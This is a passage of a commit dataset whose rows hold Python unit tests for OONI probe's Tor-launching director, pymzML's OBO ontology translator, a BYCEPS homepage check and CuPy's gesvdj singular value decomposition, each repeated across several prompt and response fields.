| column | dtype | lengths / classes |
|---|---|---|
| commit | string | 40-40 |
| old_file | string | 4-118 |
| new_file | string | 4-118 |
| old_contents | string | 0-2.94k |
| new_contents | string | 1-4.43k |
| subject | string | 15-444 |
| message | string | 16-3.45k |
| lang | string | 1 class |
| license | string | 13 classes |
| repos | string | 5-43.2k |
| prompt | string | 17-4.58k |
| response | string | 1-4.43k |
| prompt_tagged | string | 58-4.62k |
| response_tagged | string | 1-4.43k |
| text | string | 132-7.29k |
| text_tagged | string | 173-7.33k |
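
Each row below follows this schema, one field per block with `|` separator lines between fields. As a minimal sketch of loading data in this shape with the `datasets` library (the Hub id `example-org/python-commits` is a placeholder assumption, not this dataset's actual name):

```python
# Minimal sketch: load a dataset with the schema above and inspect one row.
# Assumption: "example-org/python-commits" is a hypothetical Hub id;
# substitute the real dataset identifier.
from datasets import load_dataset

ds = load_dataset("example-org/python-commits", split="train")
row = ds[0]
print(row["commit"])              # 40-character commit hash
print(row["new_file"])            # file path after the commit
print(row["subject"])             # first line of the commit message
print(row["new_contents"][:200])  # file contents after the commit
```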
307918596d4ec8ab1bbd36c3a7860d31d8849f71
|
ooni/tests/test_director.py
|
ooni/tests/test_director.py
|
from mock import patch, MagicMock
from ooni.settings import config
from ooni.director import Director
from twisted.internet import defer
from twisted.trial import unittest
class TestDirector(unittest.TestCase):
def test_get_net_tests(self):
director = Director()
nettests = director.getNetTests()
assert 'http_requests' in nettests
assert 'dnsconsistency' in nettests
assert 'http_header_field_manipulation' in nettests
assert 'traceroute' in nettests
def test_start_tor(self):
from txtorcon import TorControlProtocol
proto = MagicMock()
proto.tor_protocol = TorControlProtocol()
mock_TorState = MagicMock()
# We use the instance of mock_TorState so that the mock caching will
# return the same instance when TorState is created.
mts = mock_TorState()
mts.protocol.get_conf = lambda x: defer.succeed({'SocksPort': '4242'})
mts.post_bootstrap = defer.succeed(mts)
# Set the tor_protocol to be already fired
state = MagicMock()
proto.tor_protocol.post_bootstrap = defer.succeed(state)
mock_launch_tor = MagicMock()
mock_launch_tor.return_value = defer.succeed(proto)
@patch('ooni.director.TorState', mock_TorState)
@patch('ooni.director.launch_tor', mock_launch_tor)
@defer.inlineCallbacks
def director_start_tor():
director = Director()
yield director.startTor()
assert config.tor.socks_port == 4242
assert config.tor.control_port == 4242
config.tor_state = None
return director_start_tor()
|
Add some unittests for the director.
|
Add some unittests for the director.
|
Python
|
bsd-2-clause
|
0xPoly/ooni-probe,juga0/ooni-probe,juga0/ooni-probe,Karthikeyan-kkk/ooni-probe,kdmurray91/ooni-probe,juga0/ooni-probe,0xPoly/ooni-probe,lordappsec/ooni-probe,0xPoly/ooni-probe,Karthikeyan-kkk/ooni-probe,Karthikeyan-kkk/ooni-probe,kdmurray91/ooni-probe,lordappsec/ooni-probe,kdmurray91/ooni-probe,lordappsec/ooni-probe,kdmurray91/ooni-probe,Karthikeyan-kkk/ooni-probe,juga0/ooni-probe,lordappsec/ooni-probe,0xPoly/ooni-probe
|
Add some unittests for the director.
|
from mock import patch, MagicMock
from ooni.settings import config
from ooni.director import Director
from twisted.internet import defer
from twisted.trial import unittest
class TestDirector(unittest.TestCase):
def test_get_net_tests(self):
director = Director()
nettests = director.getNetTests()
assert 'http_requests' in nettests
assert 'dnsconsistency' in nettests
assert 'http_header_field_manipulation' in nettests
assert 'traceroute' in nettests
def test_start_tor(self):
from txtorcon import TorControlProtocol
proto = MagicMock()
proto.tor_protocol = TorControlProtocol()
mock_TorState = MagicMock()
# We use the instance of mock_TorState so that the mock caching will
# return the same instance when TorState is created.
mts = mock_TorState()
mts.protocol.get_conf = lambda x: defer.succeed({'SocksPort': '4242'})
mts.post_bootstrap = defer.succeed(mts)
# Set the tor_protocol to be already fired
state = MagicMock()
proto.tor_protocol.post_bootstrap = defer.succeed(state)
mock_launch_tor = MagicMock()
mock_launch_tor.return_value = defer.succeed(proto)
@patch('ooni.director.TorState', mock_TorState)
@patch('ooni.director.launch_tor', mock_launch_tor)
@defer.inlineCallbacks
def director_start_tor():
director = Director()
yield director.startTor()
assert config.tor.socks_port == 4242
assert config.tor.control_port == 4242
config.tor_state = None
return director_start_tor()
|
<commit_before><commit_msg>Add some unittests for the director.<commit_after>
|
from mock import patch, MagicMock
from ooni.settings import config
from ooni.director import Director
from twisted.internet import defer
from twisted.trial import unittest
class TestDirector(unittest.TestCase):
def test_get_net_tests(self):
director = Director()
nettests = director.getNetTests()
assert 'http_requests' in nettests
assert 'dnsconsistency' in nettests
assert 'http_header_field_manipulation' in nettests
assert 'traceroute' in nettests
def test_start_tor(self):
from txtorcon import TorControlProtocol
proto = MagicMock()
proto.tor_protocol = TorControlProtocol()
mock_TorState = MagicMock()
# We use the instance of mock_TorState so that the mock caching will
# return the same instance when TorState is created.
mts = mock_TorState()
mts.protocol.get_conf = lambda x: defer.succeed({'SocksPort': '4242'})
mts.post_bootstrap = defer.succeed(mts)
# Set the tor_protocol to be already fired
state = MagicMock()
proto.tor_protocol.post_bootstrap = defer.succeed(state)
mock_launch_tor = MagicMock()
mock_launch_tor.return_value = defer.succeed(proto)
@patch('ooni.director.TorState', mock_TorState)
@patch('ooni.director.launch_tor', mock_launch_tor)
@defer.inlineCallbacks
def director_start_tor():
director = Director()
yield director.startTor()
assert config.tor.socks_port == 4242
assert config.tor.control_port == 4242
config.tor_state = None
return director_start_tor()
|
Add some unittests for the director.from mock import patch, MagicMock
from ooni.settings import config
from ooni.director import Director
from twisted.internet import defer
from twisted.trial import unittest
class TestDirector(unittest.TestCase):
def test_get_net_tests(self):
director = Director()
nettests = director.getNetTests()
assert 'http_requests' in nettests
assert 'dnsconsistency' in nettests
assert 'http_header_field_manipulation' in nettests
assert 'traceroute' in nettests
def test_start_tor(self):
from txtorcon import TorControlProtocol
proto = MagicMock()
proto.tor_protocol = TorControlProtocol()
mock_TorState = MagicMock()
# We use the instance of mock_TorState so that the mock caching will
# return the same instance when TorState is created.
mts = mock_TorState()
mts.protocol.get_conf = lambda x: defer.succeed({'SocksPort': '4242'})
mts.post_bootstrap = defer.succeed(mts)
# Set the tor_protocol to be already fired
state = MagicMock()
proto.tor_protocol.post_bootstrap = defer.succeed(state)
mock_launch_tor = MagicMock()
mock_launch_tor.return_value = defer.succeed(proto)
@patch('ooni.director.TorState', mock_TorState)
@patch('ooni.director.launch_tor', mock_launch_tor)
@defer.inlineCallbacks
def director_start_tor():
director = Director()
yield director.startTor()
assert config.tor.socks_port == 4242
assert config.tor.control_port == 4242
config.tor_state = None
return director_start_tor()
|
<commit_before><commit_msg>Add some unittests for the director.<commit_after>from mock import patch, MagicMock
from ooni.settings import config
from ooni.director import Director
from twisted.internet import defer
from twisted.trial import unittest
class TestDirector(unittest.TestCase):
def test_get_net_tests(self):
director = Director()
nettests = director.getNetTests()
assert 'http_requests' in nettests
assert 'dnsconsistency' in nettests
assert 'http_header_field_manipulation' in nettests
assert 'traceroute' in nettests
def test_start_tor(self):
from txtorcon import TorControlProtocol
proto = MagicMock()
proto.tor_protocol = TorControlProtocol()
mock_TorState = MagicMock()
# We use the instance of mock_TorState so that the mock caching will
# return the same instance when TorState is created.
mts = mock_TorState()
mts.protocol.get_conf = lambda x: defer.succeed({'SocksPort': '4242'})
mts.post_bootstrap = defer.succeed(mts)
# Set the tor_protocol to be already fired
state = MagicMock()
proto.tor_protocol.post_bootstrap = defer.succeed(state)
mock_launch_tor = MagicMock()
mock_launch_tor.return_value = defer.succeed(proto)
@patch('ooni.director.TorState', mock_TorState)
@patch('ooni.director.launch_tor', mock_launch_tor)
@defer.inlineCallbacks
def director_start_tor():
director = Director()
yield director.startTor()
assert config.tor.socks_port == 4242
assert config.tor.control_port == 4242
config.tor_state = None
return director_start_tor()
|
|
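
The derived columns in the row above repeat the base fields in fixed templates: `prompt` matches `message`, `response` matches `new_contents`, `text` fuses the subject directly onto the code, and the `*_tagged` variants wrap the message in `<commit_before>`/`<commit_msg>`/`<commit_after>` markers, with `old_contents` (empty for a newly added file) after `<commit_before>`. The sketch below is inferred from the visible rows, not taken from the dataset's generation script:

```python
# Inferred construction of the derived columns (a sketch based on the rows
# shown in this preview, not the dataset's official generation code).
def build_derived(row: dict) -> dict:
    tagged_prompt = (
        "<commit_before>" + row["old_contents"]  # empty for newly added files
        + "<commit_msg>" + row["message"]
        + "<commit_after>"
    )
    return {
        "prompt": row["message"],          # subject and message coincide here
        "response": row["new_contents"],
        "prompt_tagged": tagged_prompt,
        "response_tagged": row["new_contents"],
        "text": row["subject"] + row["new_contents"],
        "text_tagged": tagged_prompt + row["new_contents"],
    }
```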
baaaaf514f516d2c7bdbe4d0679f578eb0dc7a11
|
test/test_obo.py
|
test/test_obo.py
|
import unittest
import os
import pymzml.obo
class TestObo(unittest.TestCase):
def test_valid_obo(self):
# Test features of the OBO that differ for each version
obos = {
version: pymzml.obo.oboTranslator(version)
for version in ('1.18.2', '2.0.0', '2.01.0')
}
# Changes from 1.18.2 to 2.0.0
self.assertEqual(
obos['1.18.2']['MS:0000000'],
'Proteomics Standards Initiative Mass Spectrometry Ontology'
)
self.assertEqual(
obos['2.0.0']['MS:0000000'],
'Proteomics Standards Initiative Mass Spectrometry Vocabularies'
)
self.assertEqual(
obos['2.0.0']['MS:0000000'],
obos['2.01.0']['MS:0000000'],
)
# Changes from 2.0.0 to 2.01.0
self.assertEqual(obos['1.18.2']['MS:1000854'], None)
self.assertEqual(obos['2.0.0']['MS:1000854'], None)
self.assertEqual(obos['2.01.0']['MS:1000854'], 'LTQ XL')
def test_most_recent_obo(self):
obo = pymzml.obo.oboTranslator()
self.assertEqual(obo.version, None)
# Changes only implemented in 3.78.0
self.assertEqual(
obo[obo['MS:1000130']]['is_a'],
'MS:1000808 ! chromatogram attribute',
)
def test_invalid_obo(self):
with self.assertRaises(Exception):
pymzml.obo.oboTranslator('1.1.1')
def test_getitem(self):
obo = pymzml.obo.oboTranslator('3.78.0')
data = {
'id': 'MS:1002569',
'name': 'ProteomeDiscoverer:Number of Spectra Processed At Once',
'def': '"Number of spectra processed at once in a ProteomeDiscoverer search." [PSI:PI]',
'xref': 'value-type:xsd\:int "The allowed value-type for this CV term."',
'is_a': 'MS:1002101 ! ProteomeDiscoverer input parameter',
}
# Lookup by ID and get name
self.assertEqual(obo[data['id']], data['name'])
# Lookup by name and get a dict
self.assertEqual(obo[data['name']], data)
# Nested lookup
self.assertEqual(obo[obo[data['id']]], data)
        # Lookup by definition and get the full term dict
self.assertEqual(obo[data['def']], data)
if __name__ == '__main__':
unittest.main()
|
Add unit tests for OBO translator
|
Add unit tests for OBO translator
|
Python
|
mit
|
StSchulze/pymzML,pymzml/pymzML,StSchulze/pymzML,pymzml/pymzML
|
Add unit tests for OBO translator
|
import unittest
import os
import pymzml.obo
class TestObo(unittest.TestCase):
def test_valid_obo(self):
# Test features of the OBO that differ for each version
obos = {
version: pymzml.obo.oboTranslator(version)
for version in ('1.18.2', '2.0.0', '2.01.0')
}
# Changes from 1.18.2 to 2.0.0
self.assertEqual(
obos['1.18.2']['MS:0000000'],
'Proteomics Standards Initiative Mass Spectrometry Ontology'
)
self.assertEqual(
obos['2.0.0']['MS:0000000'],
'Proteomics Standards Initiative Mass Spectrometry Vocabularies'
)
self.assertEqual(
obos['2.0.0']['MS:0000000'],
obos['2.01.0']['MS:0000000'],
)
# Changes from 2.0.0 to 2.01.0
self.assertEqual(obos['1.18.2']['MS:1000854'], None)
self.assertEqual(obos['2.0.0']['MS:1000854'], None)
self.assertEqual(obos['2.01.0']['MS:1000854'], 'LTQ XL')
def test_most_recent_obo(self):
obo = pymzml.obo.oboTranslator()
self.assertEqual(obo.version, None)
# Changes only implemented in 3.78.0
self.assertEqual(
obo[obo['MS:1000130']]['is_a'],
'MS:1000808 ! chromatogram attribute',
)
def test_invalid_obo(self):
with self.assertRaises(Exception):
pymzml.obo.oboTranslator('1.1.1')
def test_getitem(self):
obo = pymzml.obo.oboTranslator('3.78.0')
data = {
'id': 'MS:1002569',
'name': 'ProteomeDiscoverer:Number of Spectra Processed At Once',
'def': '"Number of spectra processed at once in a ProteomeDiscoverer search." [PSI:PI]',
'xref': 'value-type:xsd\:int "The allowed value-type for this CV term."',
'is_a': 'MS:1002101 ! ProteomeDiscoverer input parameter',
}
# Lookup by ID and get name
self.assertEqual(obo[data['id']], data['name'])
# Lookup by name and get a dict
self.assertEqual(obo[data['name']], data)
# Nested lookup
self.assertEqual(obo[obo[data['id']]], data)
        # Lookup by definition and get the full term dict
self.assertEqual(obo[data['def']], data)
if __name__ == '__main__':
unittest.main()
|
<commit_before><commit_msg>Add unit tests for OBO translator<commit_after>
|
import unittest
import os
import pymzml.obo
class TestObo(unittest.TestCase):
def test_valid_obo(self):
# Test features of the OBO that differ for each version
obos = {
version: pymzml.obo.oboTranslator(version)
for version in ('1.18.2', '2.0.0', '2.01.0')
}
# Changes from 1.18.2 to 2.0.0
self.assertEqual(
obos['1.18.2']['MS:0000000'],
'Proteomics Standards Initiative Mass Spectrometry Ontology'
)
self.assertEqual(
obos['2.0.0']['MS:0000000'],
'Proteomics Standards Initiative Mass Spectrometry Vocabularies'
)
self.assertEqual(
obos['2.0.0']['MS:0000000'],
obos['2.01.0']['MS:0000000'],
)
# Changes from 2.0.0 to 2.01.0
self.assertEqual(obos['1.18.2']['MS:1000854'], None)
self.assertEqual(obos['2.0.0']['MS:1000854'], None)
self.assertEqual(obos['2.01.0']['MS:1000854'], 'LTQ XL')
def test_most_recent_obo(self):
obo = pymzml.obo.oboTranslator()
self.assertEqual(obo.version, None)
# Changes only implemented in 3.78.0
self.assertEqual(
obo[obo['MS:1000130']]['is_a'],
'MS:1000808 ! chromatogram attribute',
)
def test_invalid_obo(self):
with self.assertRaises(Exception):
pymzml.obo.oboTranslator('1.1.1')
def test_getitem(self):
obo = pymzml.obo.oboTranslator('3.78.0')
data = {
'id': 'MS:1002569',
'name': 'ProteomeDiscoverer:Number of Spectra Processed At Once',
'def': '"Number of spectra processed at once in a ProteomeDiscoverer search." [PSI:PI]',
'xref': 'value-type:xsd\:int "The allowed value-type for this CV term."',
'is_a': 'MS:1002101 ! ProteomeDiscoverer input parameter',
}
# Lookup by ID and get name
self.assertEqual(obo[data['id']], data['name'])
# Lookup by name and get a dict
self.assertEqual(obo[data['name']], data)
# Nested lookup
self.assertEqual(obo[obo[data['id']]], data)
        # Lookup by definition and get the full term dict
self.assertEqual(obo[data['def']], data)
if __name__ == '__main__':
unittest.main()
|
Add unit tests for OBO translatorimport unittest
import os
import pymzml.obo
class TestObo(unittest.TestCase):
def test_valid_obo(self):
# Test features of the OBO that differ for each version
obos = {
version: pymzml.obo.oboTranslator(version)
for version in ('1.18.2', '2.0.0', '2.01.0')
}
# Changes from 1.18.2 to 2.0.0
self.assertEqual(
obos['1.18.2']['MS:0000000'],
'Proteomics Standards Initiative Mass Spectrometry Ontology'
)
self.assertEqual(
obos['2.0.0']['MS:0000000'],
'Proteomics Standards Initiative Mass Spectrometry Vocabularies'
)
self.assertEqual(
obos['2.0.0']['MS:0000000'],
obos['2.01.0']['MS:0000000'],
)
# Changes from 2.0.0 to 2.01.0
self.assertEqual(obos['1.18.2']['MS:1000854'], None)
self.assertEqual(obos['2.0.0']['MS:1000854'], None)
self.assertEqual(obos['2.01.0']['MS:1000854'], 'LTQ XL')
def test_most_recent_obo(self):
obo = pymzml.obo.oboTranslator()
self.assertEqual(obo.version, None)
# Changes only implemented in 3.78.0
self.assertEqual(
obo[obo['MS:1000130']]['is_a'],
'MS:1000808 ! chromatogram attribute',
)
def test_invalid_obo(self):
with self.assertRaises(Exception):
pymzml.obo.oboTranslator('1.1.1')
def test_getitem(self):
obo = pymzml.obo.oboTranslator('3.78.0')
data = {
'id': 'MS:1002569',
'name': 'ProteomeDiscoverer:Number of Spectra Processed At Once',
'def': '"Number of spectra processed at once in a ProteomeDiscoverer search." [PSI:PI]',
'xref': 'value-type:xsd\:int "The allowed value-type for this CV term."',
'is_a': 'MS:1002101 ! ProteomeDiscoverer input parameter',
}
# Lookup by ID and get name
self.assertEqual(obo[data['id']], data['name'])
# Lookup by name and get a dict
self.assertEqual(obo[data['name']], data)
# Nested lookup
self.assertEqual(obo[obo[data['id']]], data)
        # Lookup by definition and get the full term dict
self.assertEqual(obo[data['def']], data)
if __name__ == '__main__':
unittest.main()
|
<commit_before><commit_msg>Add unit tests for OBO translator<commit_after>import unittest
import os
import pymzml.obo
class TestObo(unittest.TestCase):
def test_valid_obo(self):
# Test features of the OBO that differ for each version
obos = {
version: pymzml.obo.oboTranslator(version)
for version in ('1.18.2', '2.0.0', '2.01.0')
}
# Changes from 1.18.2 to 2.0.0
self.assertEqual(
obos['1.18.2']['MS:0000000'],
'Proteomics Standards Initiative Mass Spectrometry Ontology'
)
self.assertEqual(
obos['2.0.0']['MS:0000000'],
'Proteomics Standards Initiative Mass Spectrometry Vocabularies'
)
self.assertEqual(
obos['2.0.0']['MS:0000000'],
obos['2.01.0']['MS:0000000'],
)
# Changes from 2.0.0 to 2.01.0
self.assertEqual(obos['1.18.2']['MS:1000854'], None)
self.assertEqual(obos['2.0.0']['MS:1000854'], None)
self.assertEqual(obos['2.01.0']['MS:1000854'], 'LTQ XL')
def test_most_recent_obo(self):
obo = pymzml.obo.oboTranslator()
self.assertEqual(obo.version, None)
# Changes only implemented in 3.78.0
self.assertEqual(
obo[obo['MS:1000130']]['is_a'],
'MS:1000808 ! chromatogram attribute',
)
def test_invalid_obo(self):
with self.assertRaises(Exception):
pymzml.obo.oboTranslator('1.1.1')
def test_getitem(self):
obo = pymzml.obo.oboTranslator('3.78.0')
data = {
'id': 'MS:1002569',
'name': 'ProteomeDiscoverer:Number of Spectra Processed At Once',
'def': '"Number of spectra processed at once in a ProteomeDiscoverer search." [PSI:PI]',
'xref': 'value-type:xsd\:int "The allowed value-type for this CV term."',
'is_a': 'MS:1002101 ! ProteomeDiscoverer input parameter',
}
# Lookup by ID and get name
self.assertEqual(obo[data['id']], data['name'])
# Lookup by name and get a dict
self.assertEqual(obo[data['name']], data)
# Nested lookup
self.assertEqual(obo[obo[data['id']]], data)
        # Lookup by definition and get the full term dict
self.assertEqual(obo[data['def']], data)
if __name__ == '__main__':
unittest.main()
|
|
9a45596d95d1bc568e0551a52abbde4a63f26393
|
tests/blueprints/test_homepage.py
|
tests/blueprints/test_homepage.py
|
"""
:Copyright: 2006-2019 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from tests.base import AbstractAppTestCase
from tests.helpers import create_brand, create_party, create_site, \
create_user, http_client
class HomePageTest(AbstractAppTestCase):
def setUp(self):
super().setUp()
brand = create_brand()
party = create_party(brand.id)
create_site(party.id)
def test_homepage(self):
with http_client(self.app) as client:
response = client.get('/')
# By default, nothing is mounted on `/`, but at least check that
# the application boots up and doesn't return a server error.
assert response.status_code == 404
|
Test homepage (even though it currently 404's)
|
Test homepage (even though it currently 404's)
|
Python
|
bsd-3-clause
|
homeworkprod/byceps,homeworkprod/byceps,m-ober/byceps,m-ober/byceps,homeworkprod/byceps,m-ober/byceps
|
Test homepage (even though it currently 404's)
|
"""
:Copyright: 2006-2019 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from tests.base import AbstractAppTestCase
from tests.helpers import create_brand, create_party, create_site, \
create_user, http_client
class HomePageTest(AbstractAppTestCase):
def setUp(self):
super().setUp()
brand = create_brand()
party = create_party(brand.id)
create_site(party.id)
def test_homepage(self):
with http_client(self.app) as client:
response = client.get('/')
# By default, nothing is mounted on `/`, but at least check that
# the application boots up and doesn't return a server error.
assert response.status_code == 404
|
<commit_before><commit_msg>Test homepage (even though it currently 404's)<commit_after>
|
"""
:Copyright: 2006-2019 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from tests.base import AbstractAppTestCase
from tests.helpers import create_brand, create_party, create_site, \
create_user, http_client
class HomePageTest(AbstractAppTestCase):
def setUp(self):
super().setUp()
brand = create_brand()
party = create_party(brand.id)
create_site(party.id)
def test_homepage(self):
with http_client(self.app) as client:
response = client.get('/')
# By default, nothing is mounted on `/`, but at least check that
# the application boots up and doesn't return a server error.
assert response.status_code == 404
|
Test homepage (even though it currently 404's)"""
:Copyright: 2006-2019 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from tests.base import AbstractAppTestCase
from tests.helpers import create_brand, create_party, create_site, \
create_user, http_client
class HomePageTest(AbstractAppTestCase):
def setUp(self):
super().setUp()
brand = create_brand()
party = create_party(brand.id)
create_site(party.id)
def test_homepage(self):
with http_client(self.app) as client:
response = client.get('/')
# By default, nothing is mounted on `/`, but at least check that
# the application boots up and doesn't return a server error.
assert response.status_code == 404
|
<commit_before><commit_msg>Test homepage (even though it currently 404's)<commit_after>"""
:Copyright: 2006-2019 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from tests.base import AbstractAppTestCase
from tests.helpers import create_brand, create_party, create_site, \
create_user, http_client
class HomePageTest(AbstractAppTestCase):
def setUp(self):
super().setUp()
brand = create_brand()
party = create_party(brand.id)
create_site(party.id)
def test_homepage(self):
with http_client(self.app) as client:
response = client.get('/')
# By default, nothing is mounted on `/`, but at least check that
# the application boots up and doesn't return a server error.
assert response.status_code == 404
|
|
9dceaaebdd2a63732fb1a9284fa29c4cc71c3e2d
|
tests/cupy_tests/test_cusolver.py
|
tests/cupy_tests/test_cusolver.py
|
import unittest
import numpy
import cupy
from cupy import testing
from cupy import cusolver
@testing.parameterize(*testing.product({
'dtype': [numpy.float32, numpy.float64, numpy.complex64, numpy.complex128],
'shape': [(5, 3), (4, 4), (3, 5)],
'order': ['C', 'F'],
'full_matrices': [True, False],
'overwrite_a': [True, False],
}))
class TestGesvdj(unittest.TestCase):
def setUp(self):
m, n = self.shape
if self.dtype == numpy.complex64:
a_real = numpy.random.random((m, n)).astype(numpy.float32)
a_imag = numpy.random.random((m, n)).astype(numpy.float32)
self.a = a_real + 1.j * a_imag
elif self.dtype == numpy.complex128:
a_real = numpy.random.random((m, n)).astype(numpy.float64)
a_imag = numpy.random.random((m, n)).astype(numpy.float64)
self.a = a_real + 1.j * a_imag
else:
self.a = numpy.random.random((m, n)).astype(self.dtype)
def test_gesvdj(self):
a = cupy.array(self.a, order=self.order)
u, s, v = cusolver.gesvdj(a, full_matrices=self.full_matrices,
overwrite_a=self.overwrite_a)
m, n = self.shape
mn = min(m, n)
if self.full_matrices:
sigma = numpy.zeros((m, n), dtype=self.dtype)
for i in range(mn):
sigma[i][i] = s[i]
sigma = cupy.array(sigma)
else:
sigma = cupy.diag(s)
if self.dtype in (numpy.complex64, numpy.complex128):
vh = v.T.conjugate()
else:
vh = v.T
aa = cupy.matmul(cupy.matmul(u, sigma), vh)
if self.dtype in (numpy.float32, numpy.complex64):
decimal = 5
else:
decimal = 10
testing.assert_array_almost_equal(aa, self.a, decimal=decimal)
def test_gesvdj_no_uv(self):
a = cupy.array(self.a, order=self.order)
s = cusolver.gesvdj(a, full_matrices=self.full_matrices,
compute_uv=False, overwrite_a=self.overwrite_a)
expect = numpy.linalg.svd(self.a, full_matrices=self.full_matrices,
compute_uv=False)
if self.dtype in (numpy.float32, numpy.complex64):
decimal = 5
else:
decimal = 10
testing.assert_array_almost_equal(s, expect, decimal=decimal)
|
Add unit tests for gesvdj
|
Add unit tests for gesvdj
|
Python
|
mit
|
cupy/cupy,cupy/cupy,cupy/cupy,cupy/cupy
|
Add unit tests for gesvdj
|
import unittest
import numpy
import cupy
from cupy import testing
from cupy import cusolver
@testing.parameterize(*testing.product({
'dtype': [numpy.float32, numpy.float64, numpy.complex64, numpy.complex128],
'shape': [(5, 3), (4, 4), (3, 5)],
'order': ['C', 'F'],
'full_matrices': [True, False],
'overwrite_a': [True, False],
}))
class TestGesvdj(unittest.TestCase):
def setUp(self):
m, n = self.shape
if self.dtype == numpy.complex64:
a_real = numpy.random.random((m, n)).astype(numpy.float32)
a_imag = numpy.random.random((m, n)).astype(numpy.float32)
self.a = a_real + 1.j * a_imag
elif self.dtype == numpy.complex128:
a_real = numpy.random.random((m, n)).astype(numpy.float64)
a_imag = numpy.random.random((m, n)).astype(numpy.float64)
self.a = a_real + 1.j * a_imag
else:
self.a = numpy.random.random((m, n)).astype(self.dtype)
def test_gesvdj(self):
a = cupy.array(self.a, order=self.order)
u, s, v = cusolver.gesvdj(a, full_matrices=self.full_matrices,
overwrite_a=self.overwrite_a)
m, n = self.shape
mn = min(m, n)
if self.full_matrices:
sigma = numpy.zeros((m, n), dtype=self.dtype)
for i in range(mn):
sigma[i][i] = s[i]
sigma = cupy.array(sigma)
else:
sigma = cupy.diag(s)
if self.dtype in (numpy.complex64, numpy.complex128):
vh = v.T.conjugate()
else:
vh = v.T
aa = cupy.matmul(cupy.matmul(u, sigma), vh)
if self.dtype in (numpy.float32, numpy.complex64):
decimal = 5
else:
decimal = 10
testing.assert_array_almost_equal(aa, self.a, decimal=decimal)
def test_gesvdj_no_uv(self):
a = cupy.array(self.a, order=self.order)
s = cusolver.gesvdj(a, full_matrices=self.full_matrices,
compute_uv=False, overwrite_a=self.overwrite_a)
expect = numpy.linalg.svd(self.a, full_matrices=self.full_matrices,
compute_uv=False)
if self.dtype in (numpy.float32, numpy.complex64):
decimal = 5
else:
decimal = 10
testing.assert_array_almost_equal(s, expect, decimal=decimal)
|
<commit_before><commit_msg>Add unit tests for gesvdj<commit_after>
|
import unittest
import numpy
import cupy
from cupy import testing
from cupy import cusolver
@testing.parameterize(*testing.product({
'dtype': [numpy.float32, numpy.float64, numpy.complex64, numpy.complex128],
'shape': [(5, 3), (4, 4), (3, 5)],
'order': ['C', 'F'],
'full_matrices': [True, False],
'overwrite_a': [True, False],
}))
class TestGesvdj(unittest.TestCase):
def setUp(self):
m, n = self.shape
if self.dtype == numpy.complex64:
a_real = numpy.random.random((m, n)).astype(numpy.float32)
a_imag = numpy.random.random((m, n)).astype(numpy.float32)
self.a = a_real + 1.j * a_imag
elif self.dtype == numpy.complex128:
a_real = numpy.random.random((m, n)).astype(numpy.float64)
a_imag = numpy.random.random((m, n)).astype(numpy.float64)
self.a = a_real + 1.j * a_imag
else:
self.a = numpy.random.random((m, n)).astype(self.dtype)
def test_gesvdj(self):
a = cupy.array(self.a, order=self.order)
u, s, v = cusolver.gesvdj(a, full_matrices=self.full_matrices,
overwrite_a=self.overwrite_a)
m, n = self.shape
mn = min(m, n)
if self.full_matrices:
sigma = numpy.zeros((m, n), dtype=self.dtype)
for i in range(mn):
sigma[i][i] = s[i]
sigma = cupy.array(sigma)
else:
sigma = cupy.diag(s)
if self.dtype in (numpy.complex64, numpy.complex128):
vh = v.T.conjugate()
else:
vh = v.T
aa = cupy.matmul(cupy.matmul(u, sigma), vh)
if self.dtype in (numpy.float32, numpy.complex64):
decimal = 5
else:
decimal = 10
testing.assert_array_almost_equal(aa, self.a, decimal=decimal)
def test_gesvdj_no_uv(self):
a = cupy.array(self.a, order=self.order)
s = cusolver.gesvdj(a, full_matrices=self.full_matrices,
compute_uv=False, overwrite_a=self.overwrite_a)
expect = numpy.linalg.svd(self.a, full_matrices=self.full_matrices,
compute_uv=False)
if self.dtype in (numpy.float32, numpy.complex64):
decimal = 5
else:
decimal = 10
testing.assert_array_almost_equal(s, expect, decimal=decimal)
|
Add unit tests for gesvdjimport unittest
import numpy
import cupy
from cupy import testing
from cupy import cusolver
@testing.parameterize(*testing.product({
'dtype': [numpy.float32, numpy.float64, numpy.complex64, numpy.complex128],
'shape': [(5, 3), (4, 4), (3, 5)],
'order': ['C', 'F'],
'full_matrices': [True, False],
'overwrite_a': [True, False],
}))
class TestGesvdj(unittest.TestCase):
def setUp(self):
m, n = self.shape
if self.dtype == numpy.complex64:
a_real = numpy.random.random((m, n)).astype(numpy.float32)
a_imag = numpy.random.random((m, n)).astype(numpy.float32)
self.a = a_real + 1.j * a_imag
elif self.dtype == numpy.complex128:
a_real = numpy.random.random((m, n)).astype(numpy.float64)
a_imag = numpy.random.random((m, n)).astype(numpy.float64)
self.a = a_real + 1.j * a_imag
else:
self.a = numpy.random.random((m, n)).astype(self.dtype)
def test_gesvdj(self):
a = cupy.array(self.a, order=self.order)
u, s, v = cusolver.gesvdj(a, full_matrices=self.full_matrices,
overwrite_a=self.overwrite_a)
m, n = self.shape
mn = min(m, n)
if self.full_matrices:
sigma = numpy.zeros((m, n), dtype=self.dtype)
for i in range(mn):
sigma[i][i] = s[i]
sigma = cupy.array(sigma)
else:
sigma = cupy.diag(s)
if self.dtype in (numpy.complex64, numpy.complex128):
vh = v.T.conjugate()
else:
vh = v.T
aa = cupy.matmul(cupy.matmul(u, sigma), vh)
if self.dtype in (numpy.float32, numpy.complex64):
decimal = 5
else:
decimal = 10
testing.assert_array_almost_equal(aa, self.a, decimal=decimal)
def test_gesvdj_no_uv(self):
a = cupy.array(self.a, order=self.order)
s = cusolver.gesvdj(a, full_matrices=self.full_matrices,
compute_uv=False, overwrite_a=self.overwrite_a)
expect = numpy.linalg.svd(self.a, full_matrices=self.full_matrices,
compute_uv=False)
if self.dtype in (numpy.float32, numpy.complex64):
decimal = 5
else:
decimal = 10
testing.assert_array_almost_equal(s, expect, decimal=decimal)
|
<commit_before><commit_msg>Add unit tests for gesvdj<commit_after>import unittest
import numpy
import cupy
from cupy import testing
from cupy import cusolver
@testing.parameterize(*testing.product({
'dtype': [numpy.float32, numpy.float64, numpy.complex64, numpy.complex128],
'shape': [(5, 3), (4, 4), (3, 5)],
'order': ['C', 'F'],
'full_matrices': [True, False],
'overwrite_a': [True, False],
}))
class TestGesvdj(unittest.TestCase):
def setUp(self):
m, n = self.shape
if self.dtype == numpy.complex64:
a_real = numpy.random.random((m, n)).astype(numpy.float32)
